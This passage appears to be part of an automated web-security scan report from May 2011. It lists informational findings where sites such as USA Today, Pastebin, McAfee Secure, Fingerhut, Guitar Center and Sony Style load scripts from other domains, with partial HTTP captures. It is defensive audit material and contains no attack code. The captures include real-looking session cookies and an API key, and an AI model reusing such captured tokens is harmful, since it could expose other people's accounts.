Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ad.turn.com/server/ads.js?pub=11185880&cch=11185948&code=11186021&l=728x90&aid=26005388&ahcid=1176968&bimpd=vdZkVJM3QxaI71kKLmsceZdJ9RnFRApAjFc4UA5mG135wdUoUiC5Q1HPXXJdmSbXZKPsp9v3PDJq4nug8RlPS8TBeaPUl7h5CbFMTJ3clnW2WwHfZiw5Ubg4AHeRFTeOqtqGkBUZ_niFSfOuLxHOYVCAueWAZTu0lF6s5dyMH0KZxrl8fFT7Zb-t61TjnLRccNlIsr9gAj5uikcAmMDdg6dE1iEB5xrt-7OPIK5R-kmPQnSmAIH4otq9UaLzNaUNKjjF0W52a_vcddgtoYB2koJqQPbg2fxY2ghlkXX7rkP3GbHcWHJECWDh_pSnr8guR6OmA-V7v7IuPvusR1pSU-oeTYzF-2jOW8WSMR0Sv-qQTUeGoA1YBjq4KIcVPzpVJ6XTb-XXauwv8fAsUcwB0bDGBOcxDF2t_Om_Sd5E6qgTATRwncXWhXpsADdzy7mL1_4OegRSAQFuCiaaREoZwrBvz00HpyKHzI3tnCJVYHCRKDpw3P6_Vokh7Wcml2N2oIvSlbN9XKd0jLLt0XzxROEraJvQxqR9-xgRqOyluanGcNnn58DS8r_TsOcdV0kx210k0C5Y4hCWwHITGP6mPNTbcfB2r9AC15SL679eJ0exb5p3kHJSsrGPw6fJ_W7SXLGKd1cbz5CFphcqTn_DY8XIOEE_VmOmyozgoopzImeIjgHkTlWhNjMob0WG4P_drzqs3D5yAyWgrnFqBRVyEMBBOZnjvxqJP_Xrgaah8EA7eJnwrpm54xvQ2eBZXdM0z3pEtsT7J70a3mE-vLqZNQ&acp=TdB-tgAFh0YK7CsSqBshPgJ9iYgmLGiFSFLeKQ&3c=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D

Request

Response

23.13. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

Response

23.14. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

23.15. http://i.usatoday.net/_common/_scripts/_oas/google.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.usatoday.net
Path:	/_common/_scripts/_oas/google.js

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /_common/_scripts/_oas/google.js HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Apr 2011 16:15:55 GMT
Accept-Ranges: bytes
ETag: "ff0e5123ff5cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 2693
Date: Mon, 16 May 2011 01:19:40 GMT
Connection: close
Vary: Accept-Encoding

var afs_num_top_ads = 3;
var afs_top_ads = "";
var afs_bottom_ads = "";

function GetParam(name) {
var match = new RegExp("[\?&]" + name + "=([^&]+)", "i").exec(location.search);
if (match
...[SNIP]...
populate an array
* of ad objects. Once that array has been populated,
* the JavaScript will call the google_afs_request_done
* function to display the ads.
*/
document.write('<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></scr' + 'ipt>
...[SNIP]...

23.16. http://pastebin.com/trends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pastebin.com
Path:	/trends

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://lolbin.net/stats.php
http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js

Request

GET /trends HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:45 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 33124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
</script>
           <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

       <script type="text/javascript" src="http://lolbin.net/stats.php"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0001007584/cstr=71920917=_4dd07bc9,3027560310,786652^1007584^1183^0,1_/xsxdata=$xsxdata/bnum=71920917/optn=64?trg=;ord=3027560310?

Request

Response

23.18. http://secureshopping.mcafee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:39:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 42652
Date: Mon, 16 May 2011 01:39:49 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping - Secure Online Shopping</title>
<meta name="d
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

23.19. http://sony.links.channelintelligence.com/pages/prices.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sony.links.channelintelligence.com
Path:	/pages/prices.asp

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAALAUt8zpIqsKKi8uVJOCT5hTcXj1yTpET-jUI4NpZZp-xQhD5bRTE1NmjXsZ6T0eGLbSNqDOycYKq_w

Request

Response

23.20. http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://travel.usatoday.com
Path:	/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1 HTTP/1.1
Host: travel.usatoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:35 GMT
Content-Length: 54487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:pas="http://sitelifestage.usatoday.c
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

23.21. http://www.cruisecritic.com/reviews/cruiseline.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cruisecritic.com
Path:	/reviews/cruiseline.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=11;ord=051511092639?
http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=13;ord=051511092639?
http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=topleft;sz=728x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=1;ord=051511092639?
http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=2;ord=051511092639?

Request

Response

23.22. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2e2ccd5c%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F10%2Fpsn-restoration-timeline-update%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.23. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

Response

23.24. http://www.fingerhut.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fingerhut.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cts.channelintelligence.com/11423_landing.js
http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.js
http://e.nexac.com/e/a-677/s-2140.js
https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
https://seal.networksolutions.com/siteseal/javascript/siteseal.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 119735
Date: Mon, 16 May 2011 01:37:34 GMT
Connection: close
Set-Cookie: JSESSIONID=ACAC16584C19BBD23236EBA14FD093AC; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
>
<head>
<style type="text/css">
body {

...[SNIP]...
<div class="homeHero"><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<div style="padding-bottom: 15px; text-align: center;">
<script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.nexac.com/e/a-677/s-2140.js"></script>
...[SNIP]...


<script src="http://cts.channelintelligence.com/11423_landing.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.js"></script>
...[SNIP]...

23.25. https://www.fingerhut.com/user/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/user/login.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

https://cts-secure.channelintelligence.com/11423_landing.js
https://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.js
https://e.nexac.com/e/a-677/s-2140.js
https://seal.networksolutions.com/siteseal/javascript/siteseal.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 83965
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=B5C80FAB7BB9405ECFD1D3237CD22862; Path=/; Secure

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
>
<head>
<style type="text/css">
body {

...[SNIP]...
<div style="padding-bottom: 15px; text-align: center;">
<script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://e.nexac.com/e/a-677/s-2140.js"></script>
...[SNIP]...


<script src="https://cts-secure.channelintelligence.com/11423_landing.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="https://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.js"></script>
...[SNIP]...

23.26. http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guitarcenter.com
Path:	/Includes/GuitarCenter/Scripts/minified/JS_Header.js

Issue detail

The response dynamically includes the following script from another domain:

http://admin12.offermatica.com/admin/mbox/mbox_debug_'+rc+'.jsp?clientCode=guitarcenter&mboxServerHost=mbox12.offermatica.com

Request

GET /Includes/GuitarCenter/Scripts/minified/JS_Header.js HTTP/1.1
Host: www.guitarcenter.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; CjPID=2537521; CjAID=10453836; ref=; ref_d=5/15/2011 9:40:10 PM; source=4ACJWXX2; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; UNICASOURCE=4ACJWXX2; UNICASOURCEL=4ACJWXX2; IsLoyaltyAvailable=False

Response

HTTP/1.1 200 OK
Content-Length: 69210
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Apr 2011 11:51:54 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
SN: 28
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:40:16 GMT

function getCookie(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;while(i<clen){var j=i+alen;if(document.cookie.substring(i,j)==arg){return getCookieVal(j);}i=docum
...[SNIP]...
ug=function(oc,pc,mc){this.qc=oc;this.p=null;this.I=mc.getCookieManager();var rc=mboxGetPageParameter(pc);if(rc==null){rc=this.I.getCookie(this.qc);}if(rc!=null){if(rc.indexOf("x")==0){document.write('<script language="Javascript1.2" src="http://admin12.offermatica.com/admin/mbox/mbox_debug_'+rc+'.jsp?clientCode=guitarcenter&mboxServerHost=mbox12.offermatica.com"></script>
...[SNIP]...

23.27. http://www.magicalkingdoms.com/blog/category/disneyland-paris/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.magicalkingdoms.com
Path:	/blog/category/disneyland-paris/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /blog/category/disneyland-paris/ HTTP/1.1
Host: www.magicalkingdoms.com
Proxy-Connection: keep-alive
Referer: http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cf6190390f14fba80a77f4845931a480; __utmz=112446104.1305508808.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112446104.424582120.1305508808.1305508808.1305508808.1; __utmc=112446104; __utmb=112446104.1.10.1305508808

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:34:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.magicalkingdoms.com/blog/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 59537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<met
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

23.28. http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mcafeesecure.com
Path:	/us/forconsumers/mcafee_certified_sites.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://images.scanalert.com/include/public.js

Request

GET /us/forconsumers/mcafee_certified_sites.jsp HTTP/1.1
Host: www.mcafeesecure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405.1305377534.1.1.utmcsr=server.iad.liveperson.net|utmccn=(referral)|utmcmd=referral|utmcct=/hcp/integration/hackersafe/hackersafe-grey.html; adclick=1103-2; __utma=185732405.396205410.1305377534.1305377534.1305377534.1; CAMEFROM=www.fingerhut.com; resin=1724539402.20480.0000

Response

HTTP/1.1 200 OK
Server: McAfeeSecure
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 70891
Connection: close
Date: Mon, 16 May 2011 01:38:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Secure T
...[SNIP]...
</script>-->
<script type="text/javascript" src="//images.scanalert.com/include/public.js"></script>
...[SNIP]...

23.29. https://www.mcafeesecure.com/RatingVerify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/RatingVerify

Issue detail

The response dynamically includes the following script from another domain:

https://server.iad.liveperson.net/hc/10599399/x.js?cmd=file&file=chatScript3&site=10599399&imageUrl=https://images.scanalert.com/images/liveperson/set03

Request

Response

HTTP/1.1 200 OK
Server: McAfeeSecure
Vary: Accept-Encoding
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: CAMEFROM=www.fingerhut.com
Content-Type: text/html; charset=utf-8
Content-Length: 10809
Connection: close
Date: Mon, 16 May 2011 01:37:34 GMT

<html>
<head>


<script>
function utmx_section(){}function utmx(){}
(function(){var k='1568676568',d=document,l=d.location,c=d.cookie;fun
...[SNIP]...
</script>
<script language='javascript' src='https://server.iad.liveperson.net/hc/10599399/x.js?cmd=file&file=chatScript3&site=10599399&imageUrl=https://images.scanalert.com/images/liveperson/set03'> </script>
...[SNIP]...

23.30. https://www.mcafeesecure.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://images.scanalert.com/include/public.js

Request

GET /favicon.ico HTTP/1.1
Host: www.mcafeesecure.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405.1305377534.1.1.utmcsr=server.iad.liveperson.net|utmccn=(referral)|utmcmd=referral|utmcct=/hcp/integration/hackersafe/hackersafe-grey.html; adclick=1103-2; __utma=185732405.396205410.1305377534.1305377534.1305377534.1; CAMEFROM=www.fingerhut.com; resin=1724539402.20480.0000

Response

HTTP/1.1 404 Not Found
Server: McAfeeSecure
Vary: Accept-Encoding
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 16 May 2011 01:37:34 GMT
Content-Length: 9922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Secure
...[SNIP]...
</script>-->
<script type="text/javascript" src="https://images.scanalert.com/include/public.js"></script>
...[SNIP]...

23.31. http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.observertoday.com
Path:	/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a71d5be7a6ba8a6
http://www.google-analytics.com/urchin.js

Request

Response

23.32. http://www.siteadvisor.com/download/windows.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.siteadvisor.com
Path:	/download/windows.html

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Request

Response

23.33. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

Response

23.34. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYCTOProcess

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

Response

23.35. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYOrderItemAddProxy

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

Response

23.36. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response dynamically includes the following script from another domain:

http://nexus2.ensighten.com/sony/Bootstrap.js

Request

Response

23.37. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The response dynamically includes the following script from another domain:

https://nexus2.ensighten.com/sony/Bootstrap.js

Request

GET /webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880
